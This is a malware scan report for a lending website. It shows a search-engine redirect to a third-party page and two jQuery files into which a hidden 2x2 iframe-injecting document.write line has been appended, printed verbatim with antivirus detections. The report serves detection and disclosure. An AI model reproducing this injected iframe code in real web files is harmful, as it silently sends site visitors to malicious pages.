New scan:

Malware Scanner report for easyonlinelender.com

Malicious/Suspicious/Total urls checked
2/0/4
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://elyisus.com/hmod.html
34 websites infected.

The website "easyonlinelender.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/3/3
3 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://easyonlinelender.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: easyonlinelender.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sun, 07 Sep 2014 17:25:11 GMT
Location: http://elyisus.com/hmod.html
Server: Apache
Content-Length: 212
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://easyonlinelender.com/
200 OK
Content-Length: 10105
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://elyisus.com/hmod.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html>

http://www.buysmartdomains.com/includes/jquery-1.3.2.min.js
200 OK
Content-Length: 57398
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
... 3127 bytes are skipped ...
ent.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html></iframe>');

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
HTML:Iframe-BNK [Trj]
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
DrWeb
JS.IFrame.480
Microsoft
Exploit:HTML/IframeRef.DM
Kaspersky
HEUR:Trojan.Script.Generic
Fortinet
JS/Iframe.HH!tr
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.YR
Symantec
Trojan.Maliframe!html

Hidden iFrame found.
size: 2x2     
src: http://elyisus.com/hmod.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html>

http://www.buysmartdomains.com/includes/jquery.validate.min.js
200 OK
Content-Length: 24665
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){$.extend($.fn,{validate:function(options){if(!this.length){options&&options.debug&&window.console&&console.warn("nothing selected, can't validate, returning nothing");return;}var validator=$.data(this[0],'validator');if(validator){return validator;}validator=new $.validator(options,this[0]);$.data(this[0],'validator',validator);if(validator.settings.onsubmit){this.find("input, button").filter(".cancel").click(function(){validator.cancelSubmit=true;});this.sub
... 3037 bytes are skipped ...
arguments[0].type=fix;return $.event.handle.apply(this,arguments);}};});$.extend($.fn,{delegate:function(type,delegate,handler){return this.bind(type,function(event){var target=$(event.target);if(target.is(delegate)){return handler.apply(target,arguments);}});},triggerEvent:function(type,target){return this.triggerHandler(type,[$.event.fix({type:type,target:target})]);}})})(jQuery);
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http:

Antivirus reports:

Avast
HTML:Iframe-BNK [Trj]
Ad-Aware
Trojan.Iframe.CEG
nProtect
Trojan.Iframe.CEG
Emsisoft
Trojan.Iframe.CEG (B)
Comodo
TrojWare.HTML.iFrame.TWTR
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.Iframe.CEG
F-Secure
Trojan.Iframe.CEG
Norman
Iframe.YR
GData
Trojan.Iframe.CEG
BitDefender
Trojan.Iframe.CEG

Hidden iFrame found.
size: 2x2     
src: http://elyisus.com/hmod.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html>

http://easyonlinelender.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=easyonlinelender.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://easyonlinelender.com/

Result: easyonlinelender.com is not infected or malware details are not published yet.